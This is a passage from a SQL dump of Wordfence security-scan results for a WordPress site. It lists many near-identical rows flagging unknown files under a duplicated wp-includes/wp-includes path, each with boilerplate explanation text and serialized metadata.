href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/registration.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34554,1631564710,1631564710,'new','knownfile',75,'9474425fdcd2623cf89f32d33382ef32','15a5e0fe1ea3489c74ff701511b8c480','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/class-wp-rest-request.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/rest-api/class-wp-rest-request.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34555,1631564710,1631564710,'new','knownfile',75,'95db3451356a32ba9aa1e9db1c9f9b9e','7ca61bfb7d969253e394cd5acdc9dd5a','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/class-wp-rest-response.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/rest-api/class-wp-rest-response.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34556,1631564711,1631564711,'new','knownfile',75,'676a0be0ab06203a3c2ac37271d222fa','abee2290d00499263b7b98c1062b15af','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/class-wp-rest-server.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/rest-api/class-wp-rest-server.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34557,1631564711,1631564711,'new','knownfile',75,'1d747ea2f4eb22ae78b3e4e88eced53b','4e9aac160473f0c078ab7a5e5e7eff38','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:93:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34558,1631564711,1631564711,'new','knownfile',75,'4f9b8b5f2288c8f35fef26c470afe5bd','908db93776ba706fb39c650488808d16','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:83:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34559,1631564711,1631564711,'new','knownfile',75,'6a3fed75810919a8db1f0e0aa57dd392','4a9e4ad9e4b8a1dfd9f8f191287eaa96','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:81:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34560,1631564711,1631564711,'new','knownfile',75,'ce34abdf38fc88446f985dcd2c216bf2','4de8b6542e99f8bf1106f4f500a38d6f','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:87:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34561,1631564711,1631564711,'new','knownfile',75,'bce77a25907aeb99637a005751351d84','687e7e524f5065b37fec2bf180f8b9c6','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:86:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34562,1631564711,1631564711,'new','knownfile',75,'69a5cc07bfabbf5b34b42f0d6222fa74','0162bf378ac9de26544f8dd8f267223f','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:83:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34563,1631564711,1631564711,'new','knownfile',75,'ffdd077ceeb1366fc94221839bca28fd','2d434f7fd2bf0759c35cd70449096c23','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34564,1631564711,1631564711,'new','knownfile',75,'44a4e1b5100ae4ffd804ace606b13f3d','087ceea0cafafd9840756c02fba7d771','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:80:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34565,1631564711,1631564711,'new','knownfile',75,'3475d0a18f07bafd4c1727c74dfc8ea3','2cacfd2dfca4bc34df17969bddd38d16','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34566,1631564711,1631564711,'new','knownfile',75,'c031562823b12eecea6c1351a5a63462','2f4a7bab741f7d229e36e5aa2ebc9f43','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:79:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34567,1631564711,1631564711,'new','knownfile',75,'080830e335547a845b954ab4bbdbcf9a','5dce5d1295e146acc205263e08a1dd3a','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:85:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34568,1631564711,1631564711,'new','knownfile',75,'342c923cf53733360044ce4313e9925e','8ddd7fad0d827ff52350275955e48925','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:82:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34569,1631564711,1631564711,'new','knownfile',75,'d778c130552313ef1d9af6681853d56f','47492d69823774506f70a1008749aaeb','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34570,1631564711,1631564711,'new','knownfile',75,'13d100b9055dcc9bae9c0c39bbb53afb','5522beaaf1b2d748aa9c4cec2937a684','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:81:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34571,1631564711,1631564711,'new','knownfile',75,'df28d8dd7d3810647097cadf41c81b07','6d40c25260f6abae7947541ec9976f3f','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34572,1631564711,1631564711,'new','knownfile',75,'0f2e4a97f2f2098dea74bf7272b1ff29','fa7136bd972c95463b7693c331034b28','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:80:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34573,1631564711,1631564711,'new','knownfile',75,'72bb5efbec7a2a7ab4e62514e7837a7f','10904225fbaeffdc30266c3feb2c31ad','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:83:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34574,1631564711,1631564711,'new','knownfile',75,'ea5159b9817553fc7c0fe1fa49dd0c51','b0d6d0735f1756fcde64696b59addb39','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:82:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34575,1631564711,1631564711,'new','knownfile',75,'5541218287b8c9c333fc0fb08845faa5','9e1fd2c4d7e8e4ccd71a857b971dd753','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34576,1631564711,1631564711,'new','knownfile',75,'e79bf589d1b16ec46701a495bb1850ef','6b1b817fa70d5fdcefd9a682a901f553','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34577,1631564711,1631564711,'new','knownfile',75,'fa14c6435e8b88431780175854f8bf4b','02e5462e441ca9c993e4d55fb86b060a','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34578,1631564711,1631564711,'new','knownfile',75,'da6db30d1bebb558fa37676b025e1f68','160a890a47d0da76d829b273d7075069','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34579,1631564711,1631564711,'new','knownfile',75,'552f151d11b75ee4c9a0d57b5c3e2a80','a1dee403181dd8236e80a76257f5e01f','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/fields/class-wp-rest-meta-fields.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/rest-api/fields/class-wp-rest-meta-fields.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34580,1631564711,1631564711,'new','knownfile',75,'d436057eb28b42f6457a19d43f1076dd','91fd89071bc86b8bbf2759990da543a7','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34581,1631564711,1631564711,'new','knownfile',75,'3dd87f1408815d1855007cc206512bc0','a7519849e682840bd076cf87a7cb5641','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34582,1631564711,1631564711,'new','knownfile',75,'6ee53315c08fb9e8c509ac723993a77e','3abfcda9006c61ee7aa3b9cb0cf93a39','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34583,1631564712,1631564712,'new','knownfile',75,'81f073b84d2c3b41de36e11509a2cc2e','623e80da4e2963bef033444f6bd9c275','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:84:\"wp-includes/wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34584,1631564712,1631564712,'new','knownfile',75,'68078dfcc823077d1d062fe4700e68fa','e269bd51cd82a9b6c3baec086ac85276','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/search/class-wp-rest-post-search-handler.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/rest-api/search/class-wp-rest-post-search-handler.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34585,1631564712,1631564712,'new','knownfile',75,'47ee8f25d0e42be697ef770631f2c723','07894239b0022ce5b42ed1d8b70d4d1d','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/search/class-wp-rest-search-handler.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:72:\"wp-includes/wp-includes/rest-api/search/class-wp-rest-search-handler.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34586,1631564712,1631564712,'new','knownfile',75,'6996024a0c887b10948e356cfa361a98','62e7d9964f4f5aa0d4819ae07da6437e','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/search/class-wp-rest-term-search-handler.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/rest-api/search/class-wp-rest-term-search-handler.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34587,1631564712,1631564712,'new','knownfile',75,'4030816089848c72fdbb83f27b52f8af','7e803dbe4119fb7cd7361d5fada8a867','Unknown file in WordPress core: wp-includes/wp-includes/rest-api.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/rest-api.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34588,1631564712,1631564712,'new','knownfile',75,'3db7ed28d9cdbbf9e196ebb1250aaa87','9c01f8c3161f19c5f69ce2d85f657f99','Unknown file in WordPress core: wp-includes/wp-includes/revision.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/revision.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34589,1631564712,1631564712,'new','knownfile',75,'14468f7f5a58018cdeaa98b7a1cc3e5b','29242a392d6499d2fe055d17de0a7849','Unknown file in WordPress core: wp-includes/wp-includes/rewrite.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/rewrite.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34590,1631564712,1631564712,'new','knownfile',75,'1f895770f774366b1ccf52afa97f05cb','04778a7a224b0c68636b79617769be91','Unknown file in WordPress core: wp-includes/wp-includes/robots-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/robots-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34591,1631564712,1631564712,'new','knownfile',75,'c22f8db0347c95500172c952560c65f8','0d410346f0931e75ac78273d524ef83c','Unknown file in WordPress core: wp-includes/wp-includes/rss-functions.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 